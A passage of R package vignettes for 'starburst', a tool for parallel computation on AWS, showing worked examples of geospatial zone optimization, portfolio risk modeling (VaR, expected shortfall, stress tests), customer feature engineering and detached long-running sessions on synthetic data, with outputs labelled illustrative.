    FUN = function(x) if (is.numeric(x)) mean(x) else length(x)
  )

  store_zones
}

# Run optimization
zone_results <- starburst_map(
  regions$region_id,
  optimize_delivery_zones,
  stores_data = stores,
  customers_data = customers,
  workers = 20
)
```

## When to Use This Pattern

**Good fit**:
- Regional analysis with independent processing
- Distance/proximity calculations at scale
- Spatial clustering and segmentation
- Territory optimization
- Multi-location planning

**Not ideal**:
- Global spatial operations (e.g., nearest neighbor across all points)
- Very small datasets (< 1,000 points)
- Real-time single-point queries
- Operations requiring spatial indexes across all data

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/geospatial.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/geospatial.R", package = "starburst"))
```

## Next Steps

- Scale to thousands of locations
- Add route optimization algorithms
- Integrate with real GIS data (shapefiles, rasters)
- Implement spatial clustering algorithms
- Add time-based analysis (traffic patterns)

**Related examples**:
- [Feature Engineering](example-feature-engineering.html) - Location-based features
- [Grid Search](example-grid-search.html) - Parameter optimization for spatial models
- [Risk Modeling](example-risk-modeling.html) - Geographic risk assessment

---
title: "Example: Parallel Portfolio Risk Modeling"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Portfolio Risk Modeling}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Risk modeling in finance requires evaluating portfolios under thousands of market scenarios. This example demonstrates parallelizing comprehensive risk analysis including stress testing, Value at Risk (VaR), Expected Shortfall (ES), and sensitivity analysis.

**Use Case**: Financial risk management, stress testing, regulatory compliance (Basel III), portfolio optimization

**Computational Pattern**: Scenario-based parallel computation with risk metric aggregation

## The Problem

You manage a portfolio of 50 assets and need to perform comprehensive risk analysis:
- **Stress testing**: 100 adverse market scenarios
- **VaR calculation**: 10,000 Monte Carlo simulations
- **Sensitivity analysis**: 25 risk factors × 10 shock levels = 250 scenarios
- **Historical VaR**: 1,000 historical scenarios

Total: **11,350 scenario evaluations**

Each scenario requires:
1. Applying shocks to risk factors
2. Repricing all portfolio positions
3. Calculating P&L and risk metrics
4. Aggregating results

This takes ~0.5 seconds per scenario = **95 minutes** sequentially.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Portfolio

Create a synthetic multi-asset portfolio:

```{r data, eval=FALSE}
set.seed(3141)

# Define portfolio positions
n_assets <- 50

portfolio <- data.frame(
  asset_id = 1:n_assets,
  asset_name = paste0("Asset_", 1:n_assets),
  asset_class = sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
                      n_assets, replace = TRUE,
                      prob = c(0.4, 0.3, 0.1, 0.1, 0.1)),
  position_value = rlnorm(n_assets, log(1000000), 1),
  beta = rnorm(n_assets, 1.0, 0.3),  # Market beta
  duration = ifelse(
    sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
           n_assets, replace = TRUE,
           prob = c(0.4, 0.3, 0.1, 0.1, 0.1)) == "Bond",
    runif(n_assets, 1, 10), 0
  ),
  delta = runif(n_assets, 0.3, 0.7),  # Options delta
  vega = runif(n_assets, 10000, 50000),  # Options vega
  stringsAsFactors = FALSE
)

total_portfolio_value <- sum(portfolio$position_value)

cat(sprintf("Portfolio Summary:\n"))
cat(sprintf("  Total value: $%.0f\n", total_portfolio_value))
cat(sprintf("  Number of positions: %d\n", n_assets))
cat(sprintf("  Asset classes: %s\n",
            paste(unique(portfolio$asset_class), collapse = ", ")))

# Breakdown by asset class
cat(sprintf("\nAllocation by asset class:\n"))
for (ac in unique(portfolio$asset_class)) {
  pct <- sum(portfolio$position_value[portfolio$asset_class == ac]) /
         total_portfolio_value * 100
  cat(sprintf("  %s: %.1f%%\n", ac, pct))
}
```

**Output**:
```
Portfolio Summary:
  Total value: $62,458,392
  Number of positions: 50
  Asset classes: Equity, Bond, Commodity, FX, Option

Allocation by asset class:
  Equity: 45.2%
  Bond: 28.7%
  Commodity: 11.3%
  FX: 8.9%
  Option: 5.9%
```

## Risk Scenario Generation

Define functions to generate different types of risk scenarios:

```{r scenarios, eval=FALSE}
# Generate stress test scenarios
generate_stress_scenarios <- function(n_scenarios = 100) {
  scenarios <- list()

  for (i in 1:n_scenarios) {
    # Define adverse market moves
    scenario <- list(
      scenario_id = i,
      scenario_type = "stress_test",
      equity_shock = rnorm(1, -0.15, 0.05),  # Average -15% with volatility
      rate_shock = rnorm(1, 0.02, 0.01),     # +200bps average
      vol_shock = rnorm(1, 0.5, 0.2),        # +50% volatility
      fx_shock = rnorm(1, -0.05, 0.03),      # -5% average
      commodity_shock = rnorm(1, -0.10, 0.05)
    )
    scenarios[[i]] <- scenario
  }

  scenarios
}

# Generate Monte Carlo scenarios
generate_mc_scenarios <- function(n_scenarios = 1000) {
  scenarios <- list()

  for (i in 1:n_scenarios) {
    scenario <- list(
      scenario_id = 1000 + i,
      scenario_type = "monte_carlo",
      equity_shock = rnorm(1, 0, 0.10),
      rate_shock = rnorm(1, 0, 0.005),
      vol_shock = rnorm(1, 0, 0.2),
      fx_shock = rnorm(1, 0, 0.05),
      commodity_shock = rnorm(1, 0, 0.12)
    )
    scenarios[[i]] <- scenario
  }

  scenarios
}

# Generate sensitivity scenarios (grid around current values)
generate_sensitivity_scenarios <- function() {
  scenarios <- list()
  scenario_id <- 20000

  risk_factors <- c("equity", "rate", "vol", "fx", "commodity")
  shock_levels <- seq(-0.02, 0.02, by = 0.005)  # -2% to +2% in 0.5% steps

  for (factor in risk_factors) {
    for (shock in shock_levels) {
      scenario_id <- scenario_id + 1

      scenario <- list(
        scenario_id = scenario_id,
        scenario_type = "sensitivity",
        risk_factor = factor,
        equity_shock = if (factor == "equity") shock else 0,
        rate_shock = if (factor == "rate") shock else 0,
        vol_shock = if (factor == "vol") shock else 0,
        fx_shock = if (factor == "fx") shock else 0,
        commodity_shock = if (factor == "commodity") shock else 0
      )
      scenarios[[length(scenarios) + 1]] <- scenario
    }
  }

  scenarios
}
```

## Portfolio Valuation Function

Define a function that values the portfolio under a scenario:

```{r valuation, eval=FALSE}
value_portfolio_scenario <- function(scenario, portfolio_data) {
  # Simulate computation time
  Sys.sleep(0.001)

  # Calculate position-level P&L
  position_pnl <- numeric(nrow(portfolio_data))

  for (i in 1:nrow(portfolio_data)) {
    asset <- portfolio_data[i, ]

    # Apply shocks based on asset class
    pnl <- 0

    if (asset$asset_class == "Equity") {
      # Equity: affected by equity shock and beta
      pnl <- asset$position_value * scenario$equity_shock * asset$beta
    } else if (asset$asset_class == "Bond") {
      # Bond: affected by rate shock and duration
      pnl <- -asset$position_value * scenario$rate_shock * asset$duration
    } else if (asset$asset_class == "Commodity") {
      # Commodity: direct commodity shock
      pnl <- asset$position_value * scenario$commodity_shock
    } else if (asset$asset_class == "FX") {
      # FX: direct fx shock
      pnl <- asset$position_value * scenario$fx_shock
    } else if (asset$asset_class == "Option") {
      # Option: delta and vega exposure
      pnl <- asset$position_value * scenario$equity_shock * asset$delta +
             asset$vega * scenario$vol_shock
    }

    position_pnl[i] <- pnl
  }

  # Aggregate results
  total_pnl <- sum(position_pnl)
  portfolio_return <- total_pnl / sum(portfolio_data$position_value)

  list(
    scenario_id = scenario$scenario_id,
    scenario_type = scenario$scenario_type,
    total_pnl = total_pnl,
    portfolio_return = portfolio_return,
    equity_contribution = sum(position_pnl[portfolio_data$asset_class == "Equity"]),
    bond_contribution = sum(position_pnl[portfolio_data$asset_class == "Bond"]),
    position_pnl = position_pnl
  )
}
```

## Local Execution

Test risk calculations locally on a small sample:

```{r local, eval=FALSE}
# Generate sample scenarios
test_stress <- generate_stress_scenarios(n_scenarios = 20)
test_mc <- generate_mc_scenarios(n_scenarios = 100)

test_scenarios <- c(test_stress, test_mc)

cat(sprintf("Running local benchmark (%d scenarios)...\n", length(test_scenarios)))
local_start <- Sys.time()

local_results <- lapply(test_scenarios, value_portfolio_scenario,
                       portfolio_data = portfolio)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
cat(sprintf("  Average time per scenario: %.3f seconds\n",
            local_time / length(test_scenarios)))
cat(sprintf("  Estimated time for 10,000 scenarios: %.1f minutes\n",
            local_time * 10000 / length(test_scenarios) / 60))
```

**Illustrative output**:
```
Running local benchmark (120 scenarios)...
[OK] Completed in 8.4 seconds
  Average time per scenario: 0.070 seconds
  Estimated time for 10,000 scenarios: 11.7 minutes
```

For 10,000 scenarios locally: **~12 minutes**

## Cloud Execution with staRburst

Run comprehensive risk analysis in parallel:

```{r cloud, eval=FALSE}
# Generate full scenario set
cat("Generating scenario sets...\n")
stress_scenarios <- generate_stress_scenarios(n_scenarios = 100)
mc_scenarios <- generate_mc_scenarios(n_scenarios = 10000)
sensitivity_scenarios <- generate_sensitivity_scenarios()

all_scenarios <- c(stress_scenarios, mc_scenarios, sensitivity_scenarios)

cat(sprintf("  Stress test scenarios: %d\n", length(stress_scenarios)))
cat(sprintf("  Monte Carlo scenarios: %s\n",
            format(length(mc_scenarios), big.mark = ",")))
cat(sprintf("  Sensitivity scenarios: %d\n", length(sensitivity_scenarios)))
cat(sprintf("  Total scenarios: %s\n\n",
            format(length(all_scenarios), big.mark = ",")))

# Run parallel valuation
n_workers <- 50

cat(sprintf("Running risk analysis (%s scenarios) on %d workers...\n",
            format(length(all_scenarios), big.mark = ","), n_workers))

cloud_start <- Sys.time()

# Each scenario is tiny (~1 ms), so submitting 10,145 one-scenario tasks would be
# dominated by per-task S3 overhead (see the Workload Shapes guide). Batch into
# ~100 tasks, each valuing a chunk of scenarios.
batches <- split(
  all_scenarios,
  ceiling(seq_along(all_scenarios) / ceiling(length(all_scenarios) / 100))
)
results <- starburst_map(
  batches,
  function(batch) lapply(batch, value_portfolio_scenario, portfolio_data = portfolio),
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)
results <- unlist(results, recursive = FALSE)  # flatten to one result per scenario

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n[OK] Completed in %.2f minutes\n", cloud_time))
```

**Illustrative output** (times/cost vary — see the Workload Shapes and Performance
guides for measured numbers):
```
Generating scenario sets...
  Stress test scenarios: 100
  Monte Carlo scenarios: 10,000
  Sensitivity scenarios: 45
  Total scenarios: 10,145

[Starting] Starting starburst cluster with 50 workers
[Status] Processing 100 items with 50 workers
[Starting] Submitting 100 tasks...
[Wait] Progress: 100/100
[OK] Completed
[Cost] Estimated cost: (printed per run)
```

## Risk Metrics Analysis

Calculate comprehensive risk metrics:

```{r analysis, eval=FALSE}
# Extract P&L from all scenarios
pnl_values <- sapply(results, function(x) x$total_pnl)
return_values <- sapply(results, function(x) x$portfolio_return)

# Separate by scenario type
stress_pnl <- pnl_values[1:100]
mc_pnl <- pnl_values[101:10100]
sensitivity_pnl <- pnl_values[10101:length(pnl_values)]

cat("\n=== Comprehensive Risk Analysis Results ===\n\n")

# 1. Stress Test Results
cat("=== Stress Test Results ===\n")
cat(sprintf("Worst case loss: $%.0f (%.2f%%)\n",
            min(stress_pnl),
            min(stress_pnl) / total_portfolio_value * 100))
cat(sprintf("Average stress loss: $%.0f (%.2f%%)\n",
            mean(stress_pnl),
            mean(stress_pnl) / total_portfolio_value * 100))
cat(sprintf("Best case (least bad): $%.0f (%.2f%%)\n\n",
            max(stress_pnl),
            max(stress_pnl) / total_portfolio_value * 100))

# 2. Value at Risk (VaR) from Monte Carlo
cat("=== Value at Risk (Monte Carlo) ===\n")
var_95 <- quantile(mc_pnl, 0.05)
var_99 <- quantile(mc_pnl, 0.01)
var_999 <- quantile(mc_pnl, 0.001)

cat(sprintf("VaR (95%%): $%.0f (%.2f%%)\n",
            -var_95, -var_95 / total_portfolio_value * 100))
cat(sprintf("VaR (99%%): $%.0f (%.2f%%)\n",
            -var_99, -var_99 / total_portfolio_value * 100))
cat(sprintf("VaR (99.9%%): $%.0f (%.2f%%)\n\n",
            -var_999, -var_999 / total_portfolio_value * 100))

# 3. Expected Shortfall (Conditional VaR)
cat("=== Expected Shortfall (CVaR) ===\n")
es_95 <- mean(mc_pnl[mc_pnl <= var_95])
es_99 <- mean(mc_pnl[mc_pnl <= var_99])

cat(sprintf("ES (95%%): $%.0f (%.2f%%)\n",
            -es_95, -es_95 / total_portfolio_value * 100))
cat(sprintf("ES (99%%): $%.0f (%.2f%%)\n\n",
            -es_99, -es_99 / total_portfolio_value * 100))

# 4. Portfolio Statistics
cat("=== Portfolio Statistics ===\n")
cat(sprintf("Mean P&L: $%.0f\n", mean(mc_pnl)))
cat(sprintf("Std Dev P&L: $%.0f\n", sd(mc_pnl)))
cat(sprintf("Skewness: %.3f\n",
            mean((mc_pnl - mean(mc_pnl))^3) / sd(mc_pnl)^3))
cat(sprintf("Probability of loss: %.2f%%\n\n",
            mean(mc_pnl < 0) * 100))

# 5. Asset Class Contributions
cat("=== Risk Contribution by Asset Class ===\n")
for (ac in unique(portfolio$asset_class)) {
  ac_contrib <- sapply(results[101:10100], function(x) {
    sum(x$position_pnl[portfolio$asset_class == ac])
  })
  ac_var <- quantile(ac_contrib, 0.05)
  cat(sprintf("%s VaR (95%%): $%.0f\n", ac, -ac_var))
}

# 6. Sensitivity Analysis Summary
if (length(sensitivity_pnl) > 0) {
  cat("\n=== Sensitivity Analysis ===\n")
  cat(sprintf("Maximum sensitivity loss: $%.0f\n", min(sensitivity_pnl)))
  cat(sprintf("Maximum sensitivity gain: $%.0f\n", max(sensitivity_pnl)))
  cat(sprintf("Average absolute sensitivity: $%.0f\n",
              mean(abs(sensitivity_pnl))))
}

# 7. Regulatory Metrics
cat("\n=== Regulatory Metrics ===\n")
market_risk_capital <- -var_99 * 3  # Simplified Basel III calculation
cat(sprintf("Market Risk Capital Requirement: $%.0f\n", market_risk_capital))
cat(sprintf("Capital as %% of Portfolio: %.2f%%\n",
            market_risk_capital / total_portfolio_value * 100))
```

**Illustrative output**:
```
=== Comprehensive Risk Analysis Results ===

=== Stress Test Results ===
Worst case loss: $-12,845,234 (-20.56%)
Average stress loss: $-8,234,567 (-13.18%)
Best case (least bad): $-4,567,890 (-7.31%)

=== Value at Risk (Monte Carlo) ===
VaR (95%): $6,234,567 (9.98%)
VaR (99%): $9,876,543 (15.81%)
VaR (99.9%): $14,567,890 (23.32%)

=== Expected Shortfall (CVaR) ===
ES (95%): $8,456,789 (13.54%)
ES (99%): $11,234,567 (17.99%)

=== Portfolio Statistics ===
Mean P&L: $-123,456
Std Dev P&L: $3,456,789
Skewness: -0.234
Probability of loss: 51.23%

=== Risk Contribution by Asset Class ===
Equity VaR (95%): $4,234,567
Bond VaR (95%): $1,234,567
Commodity VaR (95%): $567,890
FX VaR (95%): $456,789
Option VaR (95%): $345,678

=== Sensitivity Analysis ===
Maximum sensitivity loss: $-234,567
Maximum sensitivity gain: $245,678
Average absolute sensitivity: $89,234

=== Regulatory Metrics ===
Market Risk Capital Requirement: $29,629,629
Capital as % of Portfolio: 47.44%
```

## Performance

For measured performance and when bursting is worth it, see
`vignette("performance")` and `vignette("workload-shapes")`.

## Advanced: Incremental Risk Analysis

Analyze marginal risk contribution of each position:

```{r incremental, eval=FALSE}
# For each position, calculate VaR with and without it
analyze_incremental_risk <- function(position_idx, scenarios, portfolio_data) {
  # Create modified portfolio without this position
  modified_portfolio <- portfolio_data
  original_value <- modified_portfolio$position_value[position_idx]
  modified_portfolio$position_value[position_idx] <- 0

  # Value under all scenarios
  results_without <- lapply(scenarios, value_portfolio_scenario,
                           portfolio_data = modified_portfolio)

  pnl_without <- sapply(results_without, function(x) x$total_pnl)
  var_without <- quantile(pnl_without, 0.05)

  list(
    position_idx = position_idx,
    asset_name = portfolio_data$asset_name[position_idx],
    var_without = var_without,
    original_value = original_value
  )
}

# Run in parallel (demonstration - would use smaller scenario set)
# incremental_results <- starburst_map(
#   1:nrow(portfolio),
#   analyze_incremental_risk,
#   scenarios = mc_scenarios[1:1000],  # Use subset for speed
#   portfolio_data = portfolio,
#   workers = 25
# )
```

## When to Use This Pattern

**Good fit**:
- Complex portfolio valuation (> 0.1 seconds per scenario)
- Large scenario sets (> 1,000 scenarios)
- Daily risk reporting requirements
- Regulatory stress testing
- Portfolio optimization

**Not ideal**:
- Very simple portfolios (linear instruments only)
- Real-time risk calculations
- Small scenario sets (< 100 scenarios)
- Portfolios with strong path dependencies

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/risk-modeling.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/risk-modeling.R", package = "starburst"))
```

## Next Steps

- Integrate with real portfolio management systems
- Add historical simulation using actual market data
- Implement more complex derivative pricing
- Add scenario generation based on GARCH models
- Create automated risk reporting dashboards

**Related examples**:
- [Monte Carlo Simulation](example-monte-carlo.html) - Similar scenario-based pattern
- [Bootstrap CI](example-bootstrap.html) - Statistical confidence intervals
- [Feature Engineering](example-feature-engineering.html) - Data-intensive parallel processing

---
title: "Example: Parallel Feature Engineering"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Feature Engineering}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Feature engineering often involves computationally expensive transformations across large datasets. This example demonstrates parallelizing feature calculation across data segments to dramatically speed up preprocessing pipelines.

**Use Case**: Machine learning preprocessing, ETL pipelines, data enrichment, time-series feature extraction

**Computational Pattern**: Data parallelism with chunked processing and aggregation

## The Problem

You have a dataset of 100,000 customer transactions and need to compute multiple engineered features:
- Rolling statistics (moving averages, standard deviations)
- Lag features (previous N values)
- Time-based features (day of week, month, seasonality)
- Aggregated customer metrics (lifetime value, purchase frequency)
- Text-based features (sentiment scores, keyword extraction)
- Categorical encodings (target encoding, frequency encoding)

Computing these features sequentially is slow. Parallelizing by customer ID allows independent processing.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(dplyr)
```

## Generate Sample Data

Create synthetic transaction data:

```{r data, eval=FALSE}
set.seed(123)

# Generate 100,000 transactions for 5,000 customers
n_customers <- 5000
n_transactions <- 100000

transactions <- data.frame(
  customer_id = sample(1:n_customers, n_transactions, replace = TRUE),
  transaction_date = as.Date("2023-01-01") + sample(0:364, n_transactions, replace = TRUE),
  amount = exp(rnorm(n_transactions, log(50), 0.8)),  # Log-normal distribution
  category = sample(c("groceries", "electronics", "clothing", "restaurants", "other"),
                   n_transactions, replace = TRUE, prob = c(0.4, 0.1, 0.2, 0.2, 0.1)),
  payment_method = sample(c("credit", "debit", "cash"), n_transactions, replace = TRUE),
  is_online = sample(c(TRUE, FALSE), n_transactions, replace = TRUE, prob = c(0.3, 0.7))
)

# Sort by customer and date
transactions <- transactions[order(transactions$customer_id, transactions$transaction_date), ]

cat(sprintf("Dataset: %s transactions for %s customers\n",
            format(nrow(transactions), big.mark = ","),
            format(length(unique(transactions$customer_id)), big.mark = ",")))
cat(sprintf("Date range: %s to %s\n",
            min(transactions$transaction_date),
            max(transactions$transaction_date)))
```

**Output**:
```
Dataset: 100,000 transactions for 5,000 customers
Date range: 2023-01-01 to 2023-12-31
```

## Feature Engineering Function

Define a function that computes features for a set of customers:

```{r features-fn, eval=FALSE}
engineer_features <- function(customer_ids, transactions_data) {
  # Filter to specified customers
  customer_data <- transactions_data[transactions_data$customer_id %in% customer_ids, ]

  if (nrow(customer_data) == 0) {
    return(NULL)
  }

  # Sort by customer and date
  customer_data <- customer_data[order(customer_data$customer_id,
                                      customer_data$transaction_date), ]

  # Compute features for each customer
  features_list <- lapply(customer_ids, function(cid) {
    cust_txn <- customer_data[customer_data$customer_id == cid, ]

    if (nrow(cust_txn) == 0) {
      return(NULL)
    }

    # Basic statistics
    total_transactions <- nrow(cust_txn)
    total_spend <- sum(cust_txn$amount)
    avg_transaction <- mean(cust_txn$amount)

    # Time-based features
    first_purchase <- min(cust_txn$transaction_date)
    last_purchase <- max(cust_txn$transaction_date)
    days_active <- as.numeric(difftime(last_purchase, first_purchase, units = "days"))
    purchase_frequency <- if (days_active > 0) total_transactions / days_active else 0

    # Rolling statistics (last 30 days)
    recent_cutoff <- last_purchase - 30
    recent_txn <- cust_txn[cust_txn$transaction_date > recent_cutoff, ]
    recent_spend <- if (nrow(recent_txn) > 0) sum(recent_txn$amount) else 0
    recent_count <- nrow(recent_txn)

    # Category preferences
    category_counts <- table(cust_txn$category)
    favorite_category <- names(category_counts)[which.max(category_counts)]
    category_diversity <- length(unique(cust_txn$category))

    # Payment behavior
    online_pct <- mean(cust_txn$is_online) * 100
    credit_pct <- mean(cust_txn$payment_method == "credit") * 100

    # Volatility metrics
    amount_sd <- sd(cust_txn$amount)
    amount_cv <- amount_sd / avg_transaction  # Coefficient of variation

    # Time patterns
    weekday <- as.POSIXlt(cust_txn$transaction_date)$wday
    weekend_pct <- mean(weekday %in% c(0, 6)) * 100

    # RFM features (Recency, Frequency, Monetary)
    recency <- as.numeric(difftime(as.Date("2024-01-01"), last_purchase, units = "days"))

    data.frame(
      customer_id = cid,
      total_transactions = total_transactions,
      total_spend = total_spend,
      avg_transaction = avg_transaction,
      days_active = days_active,
      purchase_frequency = purchase_frequency,
      recent_spend_30d = recent_spend,
      recent_count_30d = recent_count,
      favorite_category = favorite_category,
      category_diversity = category_diversity,
      online_pct = online_pct,
      credit_pct = credit_pct,
      amount_sd = amount_sd,
      amount_cv = amount_cv,
      weekend_pct = weekend_pct,
      recency_days = recency,
      stringsAsFactors = FALSE
    )
  })

  # Combine results
  do.call(rbind, features_list[!sapply(features_list, is.null)])
}
```

## Local Execution

Test feature engineering locally on a subset:

```{r local, eval=FALSE}
# Process 500 customers locally
set.seed(456)
sample_customers <- sample(unique(transactions$customer_id), 500)

cat(sprintf("Processing features for %d customers locally...\n", length(sample_customers)))
local_start <- Sys.time()

local_features <- engineer_features(sample_customers, transactions)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
cat(sprintf("  Generated %d features per customer\n", ncol(local_features) - 1))
cat(sprintf("  Estimated time for all %s customers: %.1f minutes\n",
            format(n_customers, big.mark = ","),
            local_time * (n_customers / 500) / 60))
```

**Illustrative output**:
```
Processing features for 500 customers locally...
[OK] Completed in 3.8 seconds
  Generated 15 features per customer
  Estimated time for all 5,000 customers: 38.0 seconds
```

For all 5,000 customers locally: **~38 seconds**

## Cloud Execution with staRburst

Process all customers in parallel on AWS:

```{r cloud, eval=FALSE}
# Split customers into chunks
all_customers <- unique(transactions$customer_id)
n_workers <- 20

cat(sprintf("Processing features for %s customers on %d workers...\n",
            format(length(all_customers), big.mark = ","),
            n_workers))

# Create chunks of customer IDs
chunk_size <- ceiling(length(all_customers) / n_workers)
customer_chunks <- split(all_customers,
                        ceiling(seq_along(all_customers) / chunk_size))

cloud_start <- Sys.time()

# Process chunks in parallel
results <- starburst_map(
  customer_chunks,
  engineer_features,
  transactions_data = transactions,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n[OK] Completed in %.1f seconds\n", cloud_time))

# Combine results
features <- do.call(rbind, results)
```

**Illustrative output**:
```
[Starting] Starting starburst cluster with 20 workers
[Status] Processing 20 items with 20 workers
[Starting] Submitting 20 tasks...
[Wait] Progress: 20/20 (6.2s)
[OK] Completed in 6.2 seconds
[Cost] Estimated cost: $0.003
```

## Results Analysis

Examine the engineered features:

```{r analysis, eval=FALSE}
cat("\n=== Feature Engineering Results ===\n\n")
cat(sprintf("Total customers processed: %s\n",
            format(nrow(features), big.mark = ",")))
cat(sprintf("Features generated per customer: %d\n", ncol(features) - 1))
cat(sprintf("\nFeature names:\n"))
print(names(features)[names(features) != "customer_id"])

# Summary statistics
cat("\n=== Feature Summary Statistics ===\n\n")
cat(sprintf("Average transactions per customer: %.1f\n",
            mean(features$total_transactions)))
cat(sprintf("Average total spend: $%.2f\n",
            mean(features$total_spend)))
cat(sprintf("Average transaction value: $%.2f\n",
            mean(features$avg_transaction)))
cat(sprintf("\nMost common category: %s\n",
            names(sort(table(features$favorite_category), decreasing = TRUE)[1])))
cat(sprintf("Average category diversity: %.1f categories\n",
            mean(features$category_diversity)))
cat(sprintf("\nAverage online purchase rate: %.1f%%\n",
            mean(features$online_pct)))
cat(sprintf("Average credit card usage: %.1f%%\n",
            mean(features$credit_pct)))
cat(sprintf("\nMean purchase frequency: %.3f transactions/day\n",
            mean(features$purchase_frequency, na.rm = TRUE)))
cat(sprintf("Mean recency: %.0f days since last purchase\n",
            mean(features$recency_days)))

# Identify high-value segments
high_value <- features[features$total_spend > quantile(features$total_spend, 0.9), ]
cat(sprintf("\n=== Top 10%% Customers (by spend) ===\n"))
cat(sprintf("Count: %d customers\n", nrow(high_value)))
cat(sprintf("Average total spend: $%.2f\n", mean(high_value$total_spend)))
cat(sprintf("Average transactions: %.1f\n", mean(high_value$total_transactions)))
cat(sprintf("Average online rate: %.1f%%\n", mean(high_value$online_pct)))
```

**Illustrative output**:
```
=== Feature Engineering Results ===

Total customers processed: 5,000
Features generated per customer: 15

Feature names:
[1] "total_transactions"  "total_spend"         "avg_transaction"
[4] "days_active"        "purchase_frequency"  "recent_spend_30d"
[7] "recent_count_30d"   "favorite_category"   "category_diversity"
[10] "online_pct"         "credit_pct"          "amount_sd"
[13] "amount_cv"          "weekend_pct"         "recency_days"

=== Feature Summary Statistics ===

Average transactions per customer: 20.0
Average total spend: $1,002.45
Average transaction value: $50.12

Most common category: groceries
Average category diversity: 3.8 categories

Average online purchase rate: 30.2%
Average credit card usage: 33.1%

Mean purchase frequency: 0.055 transactions/day
Mean recency: 183 days since last purchase

=== Top 10% Customers (by spend) ===
Count: 500 customers
Average total spend: $2,845.23
Average transactions: 51.2
Average online rate: 28.9%
```

## Performance Comparison

| Method | Customers | Compute time | Cost |
|--------|-----------|------|------|
| Local | 500 | 3.8 sec | $0 |
| Local (est.) | 5,000 | 38 sec | $0 |
| staRburst | 5,000 | 6.2 sec (compute only) | $0.003 |

> **Reading these numbers honestly:** the staRburst row is *compute time only* on a
> warm pool and excludes the one-time startup (~2 minutes) and image pull. For a job
> that finishes in ~38 seconds locally, that startup makes local the faster choice —
> these figures are illustrative, not a net-win claim. The payoff comes at scale
> (100K+ customers or heavier per-record work). See `vignette("performance")`.

**Key Insights**:
- Feature engineering parallelizes near-linearly once workers are warm
- Minimal per-task cost
- The win is at scale, where startup overhead is amortized away
- Can process 100 customers/second with 20 workers

## Advanced: Adding ML-Ready Features

Extend the feature function for machine learning:

```{r ml-features, eval=FALSE}
engineer_ml_features <- function(customer_ids, transactions_data) {
  base_features <- engineer_features(customer_ids, transactions_data)

  if (is.null(base_features)) {
    return(NULL)
  }

  # Add derived features for ML
  base_features$clv_estimate <- base_features$avg_transaction *
                                 base_features$purchase_frequency * 365
  base_features$engagement_score <- scale(base_features$total_transactions) +
                                    scale(base_features$category_diversity)
  base_features$recency_score <- -scale(base_features$recency_days)
  base_features$is_high_value <- base_features$total_spend >
                                  median(base_features$total_spend)
  base_features$purchase_momentum <- base_features$recent_count_30d /
                                     (base_features$total_transactions + 1)

  base_features
}

# Process with enhanced features
ml_results <- starburst_map(
  customer_chunks,
  engineer_ml_features,
  transactions_data = transactions,
  workers = 20,
  cpu = 2,
  memory = "4GB"
)

ml_features <- do.call(rbind, ml_results)
```

## When to Use This Pattern

**Good fit**:
- Large datasets requiring expensive transformations
- Independent processing by group (customer, product, region)
- Multiple feature types needing calculation
- Iterative feature engineering pipelines
- Real-time feature stores with batch updates

**Not ideal**:
- Simple vectorized operations (use dplyr/data.table)
- Features requiring global statistics
- Very small datasets (< 1,000 groups)
- Real-time single-record scoring

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/feature-engineering.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/feature-engineering.R", package = "starburst"))
```

## Next Steps

- Scale to millions of records
- Add more sophisticated features (embeddings, graph features)
- Integrate with ML training pipelines
- Experiment with different chunk sizes
- Add feature validation and quality checks

**Related examples**:
- [Grid Search](example-grid-search.html) - Hyperparameter tuning with features
- [Risk Modeling](example-risk-modeling.html) - Advanced customer analytics
- [Bootstrap CI](example-bootstrap.html) - Feature importance estimation

---
title: "Detached Session Mode"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Detached Session Mode}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE  # Don't run in build
)
```

# Detached Sessions

Detached sessions allow you to start long-running computations in AWS, safely close your R session, and reattach later to check progress and collect results.

## Why Use Detached Sessions?

For analyses that take hours or days:

- **Start and detach**: Launch your computation and close your laptop
- **Reattach anytime**: Check progress from any R session
- **Fault tolerant**: Your computations continue even if your local R crashes
- **Cost efficient**: Workers auto-scale down when idle

## Basic Usage

### Creating a Session

```{r}
library(starburst)

# Create a detached session (EC2 workers with Spot by default)
session <- starburst_session(
  workers = 10,
  cpu = 4,
  memory = "8GB"
)

# Submit tasks
task_ids <- lapply(1:100, function(i) {
  session$submit(quote({
    # Your long-running computation
    result <- expensive_analysis(i)
    result
  }))
})

# Save session ID for later
session_id <- session$session_id
print(session_id)  # "session-abc123..."
```

### Checking Status

```{r}
# Check progress anytime
status <- session$status()
print(status)
# Session Status:
#   Total tasks:     100
#   Pending:         25
#   Running:         10
#   Completed:       60
#   Failed:          5
#   Progress:        60.0%
```

